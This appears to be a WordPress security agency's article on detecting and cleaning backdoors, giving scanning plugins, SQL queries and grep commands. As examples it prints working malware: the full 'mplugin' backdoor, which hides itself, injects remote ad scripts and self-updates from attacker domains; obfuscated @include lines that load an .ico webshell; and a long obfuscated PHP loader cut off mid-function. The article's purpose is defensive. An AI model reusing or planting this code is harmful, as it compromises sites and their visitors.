WordPress being the most popular CMS in the world, has made it a prime target for hackers. Thus, it has become common that during routine customer interventions we see many well-hidden backdoors that the administrator was not aware of: the goal for hackers is to remain as discreet as possible.
Today the sites are not necessarily subject to defaces or simply displaying These sites are exploited by the attackers in the most discreet way possible to avoid detection and removal, this is called : advanced persistent threat.
Indeed, in the majority of cases, the affected sites are those that are no longer updated.WordPress regularly proposes to update its core to patch critical flaws throughout the year, the same goes for plugins. If you don’t update them and one of these plugins not updated contains a flaw, then it will only take 5 minutes for a hacker to discover it, especially thanks to sites like WP Sec.
A more critical flaw is shared hosting: a site that is not yours infects the server, which in turn infects you. Thus, Siteground users have been victims of turn to turn infections of their site.
That’s why we recommend our dedicated hosting (a single server for you only).
If you’re reading this article today, chances are you’ve dealt with this before and are looking for diagnostic and then disinfection solutions. So look no further: this article summarizes the main actions to take in order to clean up your site WordPress from backdoors, shells, malware and viruses.
Analyze your WordPress site with plugins
The first and easiest thing to do on our list is to install a plugin directly on your WordPress. There are several plugins dedicated to security on WordPress, but few of them offer complete analysis from the back office.
The free plugin that we are interested in in this case is :
Wordfence Security – Firewall & Malware Scan
Thanks to this plugin, you can in two clicks launch an analysis of the server, the modified files, the most common malwares that can be detected by the plugin… In short, a complete check-up for your site. This is the first thing to do in case of suspicion of hacking.
Be careful though, the plugin can sometimes designate some files as malicious because they contain base64 encrypted code, but this is not always the case. So remember to always backup your files or call an expert.
WARNING The majority of WordPress viruses are designed to be undetected by these WordPress antimalwares
Search for and delete unknown admin accounts as well as articles and pages you did not make
Block XML-RPC and REST API if you don’t use them
Never heard of these features? Then chances are you don’t need them. They allow malware to execute code remotely and regenerate itself, so it’s best to block them preemptively.
All this is done in a few clicks with :
iThemes Security (formerly Better WP Security)
After having launched the automatic securisation of the site we advise you to register your site to the anti-botnet. This has the advantage, even if your site is already contaminated, to block the ip of the attacker and his remote control server (C&C botnet…).
In the options go to the WordPress feature settings:
Then check and select the following options (all the recommended ones actually):
This will limit the risk of re-infection: in general, when your WordPress is infected by malware, even if you delete it, it is automatically re-injected by a remote server that constantly monitors the level of infection of your site via the features we just disabled.
By blocking them the virus will not be re-injected!
Analyze WordPress database tables
It is possible within a WordPress site to inject PHP and JavaScript code directly from a database table. Many plugins exist for this, but it is not these plugins that interest us here: only the method used to execute malicious code.
Some relatively clever malware stores a <script> tag directly in the wp-options table. So consider running an SQL query like this to make sure you are not affected:
SELECT * FROM `wp_options` WHERE (CONVERT(`option_name` USING utf8mb4) LIKE '%ad_code%' OR CONVERT(`option_value` USING utf8mb4) LIKE '%ad_code%' OR CONVERT(`autoload` USING utf8mb4) LIKE '%ad_code%') LIMIT 50
Manually, you just have to go in the database of your wordpress then in the options table (by default wp-options but your prefix can change) then search there
<script
or again
<php
Example of a viral code at one of our clients:
'ad_code', 'n<script type='text/javascript' src='//aanqylta.com/bb/2f/82/bb2f8268f180d7e0e1613e43c3e34d23.js'></script>n<script type='text/javascript' src='//aanqylta.com/a4/8a/80/a48a807e59fb8d5503642ee3fcbb8f87.js'></script>n', 'yes'
Here the site will automatically execute the remote files:
aanqylta.com/bb/2f/82/bb2f8268f180d7e0e1613e43c3e34d23.js aanqylta.com/a4/8a/80/a48a807e59fb8d5503642ee3fcbb8f87.js
which are encrypted wordpress viral injectors (you don’t need to be a computer engineer to understand that code executed remotely encrypted on a wordpress is likely to be harmful).
Again, be careful what you find and remove, as it can sometimes be results from simple ad plugins, loading Google Ads (for example). Or even code injected by legitimate plugins like code snippets.
In case of doubt we recommend you to turn to Acinonyx Web Agency: our experienced staff will know how to differentiate a malware from a conventional encrypted function.
Analyze file-level changes on the server side
For this step, you will need to connect to SSH in order to execute command lines and analyze their return. For each command, remember to replace “/var/www/wordpress/” with the path to your site.
In FTP, it is useless to rely on the file change date because it can be easily falsified. On the other hand, the chmod can be a good indicator…
As usual, be careful before deleting files or code snippets that might not be infected (false positives).
Search for mplugin.php in your wordpress plugin folder
Most common infection it deserves a whole part. Many customers download nulled or cracked themes or plugins. Except that nothing is free and you pay the price later: your site displays advertising to pay the hacker:
This is mplugins.php (even with an extra “s”, the malware remains the same).
You will never see anything because the plugin hides in the plugin list, records admins ips and hides the ad from them which will only be visible to third party visitors :
<?php /** * Plugin Name: Monetization Code plugin * Description: mplugin Shows cusom codes to display your ad codes. * Author: aerin Singh * Version: 1.0 */ error_reporting(0); ini_set('display_errors', 0); $plugin_key='4ab94009633ce74d72c165d5b5577957'; $version='1.2'; add_action('admin_menu', function() { add_options_page( 'mplugin Plugin', 'mplugin', 'manage_options', 'mplugin', 'mplugin_page' ); remove_submenu_page( 'options-general.php', 'mplugin' ); }); add_filter('plugin_action_links_'.plugin_basename(__FILE__), 'salcode_add_plugin_page_settings_mplugin'); function salcode_add_plugin_page_settings_mplugin( $links ) { $links[] = '<a href="' . admin_url( 'options-general.php?page=mplugin' ) . '">' . __('Settings') . '</a>'; return $links; } add_action( 'admin_init', function() { register_setting( 'mplugin-settings', 'default_mont_options' ); register_setting( 'mplugin-settings', 'ad_code' ); register_setting( 'mplugin-settings', 'hide_admin' ); register_setting( 'mplugin-settings', 'hide_logged_in' ); register_setting( 'mplugin-settings', 'display_ad' ); register_setting( 'mplugin-settings', 'search_engines' ); register_setting( 'mplugin-settings', 'auto_update' ); register_setting( 'mplugin-settings', 'ip_admin'); register_setting( 'mplugin-settings', 'cookies_admin' ); register_setting( 'mplugin-settings', 'logged_admin' ); register_setting( 'mplugin-settings', 'log_install' ); }); $ad_code=" <script type='text/javascript' src='//aanqylta.com/bb/2f/82/bb2f8268f180d7e0e1613e43c3e34d23.js'></script> <script type='text/javascript' src='//aanqylta.com/a4/8a/80/a48a807e59fb8d5503642ee3fcbb8f87.js'></script> "; $hide_admin='on'; $hide_logged_in='on'; $display_ad='organic'; $search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com'; $auto_update='on'; $ip_admin='on'; $cookies_admin='on'; $logged_admin='on'; $log_install=''; function mplugin_page() { ?> <div class="wrap"> <form action="options.php" method="post"> <?php settings_fields( 'mplugin-settings' ); do_settings_sections( 'mplugin-settings' ); $ad_code=''; $hide_admin='on'; $hide_logged_in='on'; $display_ad='organic'; $search_engines='google.,/search?,images.google., web.info.com, search.,yahoo.,yandex,msn.,baidu,bing.,doubleclick.net,googleweblight.com'; $auto_update='on'; $ip_admin='on'; $cookies_admin='on'; $logged_admin='on'; $log_install=''; ?> <h2>mplugin Plugin</h2> <table> <tr> <th>Ad Code</th> <td><textarea placeholder="" name="ad_code" rows="5" cols="130"><?php echo get_option('ad_code',$ad_code) ; ?></textarea></td> </tr> <tr> <th>Hide ads to :</th> <td> <input type="hidden" id="default_mont_options" name="default_mont_options" value="on"> <label> <input type="checkbox" name="hide_admin" <?php echo esc_attr( get_option('hide_admin',$hide_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />admins </label> <label> <input type="checkbox" name="hide_logged_in" <?php echo esc_attr( get_option('hide_logged_in',$hide_logged_in) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in users </label> <br/> </td> </tr> <tr> <th>Recognize admin by :</th> <td> <label> <input type="checkbox" name="logged_admin" <?php echo esc_attr( get_option('logged_admin',$logged_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />logged in </label> <label> <input type="checkbox" name="ip_admin" id="ip_admin" <?php echo esc_attr( get_option('ip_admin',$ip_admin) ) == 'on' ? 'checked="checked"' : '' ?> />By IP addresses </label> <label> <input type="checkbox" name="cookies_admin" <?php echo esc_attr( get_option('cookies_admin',$cookies_admin) ) == 'on' ? 'checked="checked"' : ''; ?> />By Cookies </label> </td> </tr> <tr> <th>Display ads to :</th> <td> <select name="display_ad"> <option value="organic" <?php echo esc_attr( get_option('display_ad',$display_ad) ) == 'organic' ? 'selected="selected"' : ''; ?>>Organic traffic only</option> <option value="all_visitors" <?php echo esc_attr( get_option('display_ad') ) == 'all_visitors' ? 'selected="selected"' : ''; ?>>All Visitors</option> </select> </td> </tr> <tr> <th>Search Engines</th> <td><input type="text" placeholder="Internal title" name="search_engines" value="<?php echo esc_attr( get_option('search_engines',$search_engines) ); ?>" size="80" /><p class="description"> comma separated </p> </td> </tr> <tr> <th>Auto Update :</th> <td> <label> <input type="checkbox" name="auto_update" <?php echo esc_attr( get_option('auto_update',$auto_update) ) == 'on' ? 'checked="checked"' : ''; ?> />auto update plugin </label><br/> </td> </tr> <tr> <td><?php submit_button(); ?></td> </tr> </table> </form> </div> <?php } /*************************log install***************************/ if(get_option('log_install') !=='1') { if(!$log_installed = @file_get_contents("http://www.tomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"])) { $log_installed = @file_get_contents_mplugin("http://www.tomndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]); } } /*************************set default options***************************/ if(get_option('default_mont_options') !=='on') { update_option('ip_admin', $ip_admin); update_option('ad_code', $ad_code); update_option('cookies_admin', $cookies_admin); update_option('logged_admin', $logged_admin); update_option('hide_admin', $hide_admin); update_option('hide_logged_in', $hide_logged_in); update_option('display_ad', $display_ad); update_option('search_engines', $search_engines); update_option('auto_update', $auto_update); update_option('log_install', '1'); } /************************************************************************/ include_once(ABSPATH . 'wp-includes/pluggable.php'); if ( ! function_exists( 'display_ad_single' ) ) { function display_ad_single($content){ if(is_single()) { $content=$content.get_option('ad_code');; } return $content; } function display_ad_footer(){ if(!is_single()) { echo get_option('ad_code'); } } //setting cookies if admin logged in function setting_admin_cookie() { setcookie( 'wordpress_admin_logged_in',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN); } if(get_option('cookies_admin')=='on') { if(is_user_logged_in()) { add_action( 'init', 'setting_admin_cookie',1 ); } } //log admin IP addresses $vis_ip=getVisIpAddr_mplugin(); if(get_option('ip_admin')=='on') { if(current_user_can('edit_others_pages')) { if (file_exists(plugin_dir_path( __FILE__ ) .'admin_ips.txt')) { $ip=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt'); } if (stripos($ip, $vis_ip) === false) { $ip.=$vis_ip.' '; @file_put_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt',$ip); } } }// end if log admins ip //add cookies to organic traffic if(get_option('display_ad')=='organic') { $search_engines = explode(',', get_option('search_engines')); $referer = $_SERVER['HTTP_REFERER']; $SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com'); foreach ($search_engines as $search) { if (strpos($referer,$search)!==false) { setcookie("organic", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); $organic=true; } } }//end //display ad if(!isset($_COOKIE['wordpress_admin_logged_in']) && !is_user_logged_in()) { $ips=@file_get_contents(plugin_dir_path( __FILE__ ) .'admin_ips.txt'); if (stripos($ips, $vis_ip) === false) { /*****/ if(get_option('display_ad')=='organic') { if($organic==true || isset($_COOKIE['organic'])) { add_filter('the_content','display_ad_single'); add_action('wp_footer','display_ad_footer'); } } else { add_filter('the_content','display_ad_single'); add_action('wp_footer','display_ad_footer'); } /****/ } } /*******************/ //update plugin if(get_option('auto_update')=='on') { if( ini_get('allow_url_fopen') ) { if (($new_version = @file_get_contents("http://www.tomndo.com/update.php") OR $new_version = @file_get_contents_mplugin("http://www.tomndo.com/update.php")) AND stripos($new_version, $plugin_key) !== false) { if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) { @file_put_contents(__FILE__, $new_version); } } elseif ($new_version = @file_get_contents("http://www.tomndo.xyz/update.php") AND stripos($new_version, $plugin_key) !== false) { if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) { @file_put_contents(__FILE__, $new_version); } } elseif ($new_version = @file_get_contents("http://www.tomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) { if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) { @file_put_contents(__FILE__, $new_version); } } } else { if (($new_version = @file_get_contents("http://www.tomndo.com/update.php") OR $new_version = @file_get_contents_mplugin("http://www.tomndo.com/update.php")) AND stripos($new_version, $plugin_key) !== false) { if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) { @file_put_contents(__FILE__, $new_version); } } elseif ($new_version = @file_get_contents_mplugin("http://www.tomndo.xyz/update.php") AND stripos($new_version, $plugin_key) !== false) { if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) { @file_put_contents(__FILE__, $new_version); } } elseif ($new_version = @file_get_contents_mplugin("http://www.tomndo.top/update.php") AND stripos($new_version, $plugin_key) !== false) { if (stripos($new_version, $plugin_key) !== false AND stripos($new_version, '$version=') !== false) { @file_put_contents(__FILE__, $new_version); } } } }//end if auto update /*********************************/ }// if function exist function file_get_contents_mplugin($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function hide_plugin_mplugin() { global $wp_list_table; $hidearr = array('mplugin.php'); $myplugins = $wp_list_table->items; foreach ($myplugins as $key => $val) { if (in_array($key,$hidearr)) { unset($wp_list_table->items[$key]); } } } add_action('pre_current_active_plugins', 'hide_plugin_mplugin'); function getVisIpAddr_mplugin() { if (!empty($_SERVER['HTTP_CLIENT_IP'])) { return $_SERVER['HTTP_CLIENT_IP']; } else if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { return $_SERVER['HTTP_X_FORWARDED_FOR']; } else { return $_SERVER['REMOTE_ADDR']; } } ?>
m for moneyplugin or how to make your victims profitable.
Here it was Updraftplus the culprit, which is found with this ssh command:
grep -r -i --include=*.php 'mplugin.php' /var/www/
Translation: who generated mplugin? Let him denounce himself!
Usually it also infects the /wp-include/functions.php file, which you will also need to disinfect.
We can only advise you to remove the cracked/nulled plugins involved although removing the infected part is enough. Not only is this illegal, but hacked plugins are always more or less infected in some way.
Remember: if it’s free, you’re the product
Analyze native WordPress core files
First thing to do: check if the native WordPress files have been modified. This is the easiest step, just run the following command:
nano /var/www/wordpress/index.php nano /var/www/wordpress/wp-config.php nano /var/www/wordpress/wp-settings.php
And check if these files contain at the top or bottom, encrypted code or an “@include”. This can either be a sequence of incomprehensible letters and words, or base64 code.
If so: delete them.
You can also use this command to list .php files containing “@include” :
grep -r -i --include=*.php '*/ @include' /var/www/
Example of infected code:
@include "\057var/\167ww/h\164ml/w\160-inc\154udes\057Simp\154ePie\057.639\1466911\056ico"; @include "\057var/\167ww/h\164ml/w\160-inc\154udes\057Simp\154ePie\057.639\1466911\056ico"; @include "\057var\057www\057htm\154/wp\055inc\154ude\163/Si\155ple\120ie/\056639\146691\061.ic\157"; @include "\057var/\167ww/h\164ml/w\160-inc\154udes\057Simp\154ePie\057.639\1466911\056ico"; @include "\057var/\167ww/h\164ml/w\160-inc\154udes\057Simp\154ePie\057.639\1466911\056ico"; @include "\057var/\167ww/h\164ml/w\160-inc\154udes\057Simp\154ePie\057.639\1466911\056ico"; @include "\057va\162/w\167w/\150tm\154/w\160-i\156cl\165de\163/S\151mp\154eP\151e/\05663\071f6\07111\056ic\157"; @include "\057var/\167ww/h\164ml/w\160-inc\154udes\057Simp\154ePie\057.639\1466911\056ico"; @include "\057var/\167ww/h\164ml/w\160-inc\154udes\057Simp\154ePie\057.639\1466911\056ico"; @include "\057v\141r\057w\167w\057h\164m\154/\167p\055i\156c\154u\144e\163/\123i\155p\154e\120i\145/\0566\0639\1466\0711\061.\151c\157"; @include "\057var\057www\057htm\154/wp\055inc\154ude\163/Si\155ple\120ie/\056639\146691\061.ic\157"; @include "\057va\162/w\167w/\150tm\154/w\160-i\156cl\165de\163/S\151mp\154eP\151e/\05663\071f6\07111\056ic\157"; @include "\057v\141r\057w\167w\057h\164m\154/\167p\055i\156c\154u\144e\163/\123i\155p\154e\120i\145/\0566\0639\1466\0711\061.\151c\157"; @include "\057va\162/w\167w/\150tm\154/w\160-i\156cl\165de\163/S\151mp\154eP\151e/\05663\071f6\07111\056ic\157";
It’s that type of malware : .ico obfuscated webshell injected by dropper (you must have downloaded a plugin from an unofficial source).
Once deciphered on https://www.unphp.netYou can see that there are multiple shellcodes in .ico that you will have to remove:
@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";@include "/var/www/html/wp-includes/SimplePie/.639f6911.ico";
Remove them and then with the following command detect if there are other infected .ico’s:
grep -r -i --include=*.ico 'preg_replace' /var/www/
Usually this is not enough, the core of the malware must be removed to suppress any regeneration. To find it, here are some steps to follow:
Look for files containing encrypted and/or base64 code
grep -Er '[A-Za-z0-9+/]{4}*([A-Za-z0-9+/]{4}|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==)' /var/www/wordpress/* grep -Erl '[[:alnum:]/+]{20,}' /var/www/wordpress/* grep -rl 'base64_encode' /var/www/wordpress/*
These command lines will display all files containing suspicious code. All that’s left to do is to analyze them one by one.
Here are some examples of encrypted malware:
<?php $a2b51c7d0 = 290;$GLOBALS['kf0800b21'] = Array();global $kf0800b21;$kf0800b21 = $GLOBALS;${"x47x4cx4fBx41x4cx53"}['e7ad307'] = "x27x75x34x20x79x7ex7ax7bx43x21x38x4ex51x47x63x29x55x59x42x5bx77x61x62x4cx23x53x71x68x22x5dx3fx58x2cx72x6fx24x6bx3exdx35x78x37x5ex32x57x54x6cx73x76x66x65x69x4dx5ax9x33x3cxax36x5cx67x60x50x7cx64x6ex3ax40x46x4ax7dx2ex2fx25x45x39x70x31x5fx3bx49x30x26x3dx52x48x2ax6ax6dx44x4bx56x2dx28x4fx2bx41x74";$kf0800b21[$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][50]] = $kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][27].$kf0800b21['e7ad307'][33];$kf0800b21[$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][75]] = $kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][64];$kf0800b21[$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][55]] = $kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][65];$kf0800b21[$kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][21]] = $kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][65].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][97];$kf0800b21[$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][64]] = $kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][6].$kf0800b21['e7ad307'][50];$kf0800b21[$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][41]] = $kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][27].$kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][48].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][65];$kf0800b21[$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][75]] = $kf0800b21['e7ad307'][1].$kf0800b21['e7ad307'][65].$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][6].$kf0800b21['e7ad307'][50];$kf0800b21[$kf0800b21['e7ad307'][27].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][41]] = $kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][50];$kf0800b21[$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][50]] = $kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][88].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][88].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][97];$kf0800b21[$kf0800b21['e7ad307'][26].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][64]] = $kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][2];$kf0800b21[$kf0800b21['e7ad307'][60].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][81]] = $kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][43];$kf0800b21[$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][50]] = $_POST;$kf0800b21[$kf0800b21['e7ad307'][40].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][2]] = $_COOKIE;@$kf0800b21[$kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][21]]($kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][60], NULL);@$kf0800b21[$kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][21]]($kf0800b21['e7ad307'][46].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][60].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][33].$kf0800b21['e7ad307'][47], 0);@$kf0800b21[$kf0800b21['e7ad307'][76].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][77].$kf0800b21['e7ad307'][21]]($kf0800b21['e7ad307'][88].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][40].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][40].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][1].$kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][34].$kf0800b21['e7ad307'][65].$kf0800b21['e7ad307'][78].$kf0800b21['e7ad307'][97].$kf0800b21['e7ad307'][51].$kf0800b21['e7ad307'][88].$kf0800b21['e7ad307'][50], 0);@$kf0800b21[$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][50]](0);$u63f1 = NULL;$p39bec = NULL;$kf0800b21[$kf0800b21['e7ad307'][20].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][10]] = $kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][92].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][92].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][55].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][92].$kf0800b21['e7ad307'][22].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][92].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][49].$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][64].$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][64];global $w9af8;function a862($u63f1, $b7d73df){global $kf0800b21;$l669cad = "";for ($l7574d672=0; $l7574d672<$kf0800b21[$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][55]]($u63f1);){for ($p596=0; $p596<$kf0800b21[$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][55]]($b7d73df) && $l7574d672<$kf0800b21[$kf0800b21['e7ad307'][50].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][39].$kf0800b21['e7ad307'][43].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][55]]($u63f1); $p596++, $l7574d672++){$l669cad .= $kf0800b21[$kf0800b21['e7ad307'][47].$kf0800b21['e7ad307'][2].$kf0800b21['e7ad307'][41].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][10].$kf0800b21['e7ad307'][81].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][50]]($kf0800b21[$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][75]]($u63f1[$l7574d672]) ^ $kf0800b21[$kf0800b21['e7ad307'][21].$kf0800b21['e7ad307'][58].$kf0800b21['e7ad307'][14].$kf0800b21['e7ad307'][75].$kf0800b21['e7ad307'][75]]($b7d73df[$p596]));}}return $l669cad;}function t94afa4($u63f1, $b7d73df){global $kf0800b21;global $w9af8;return 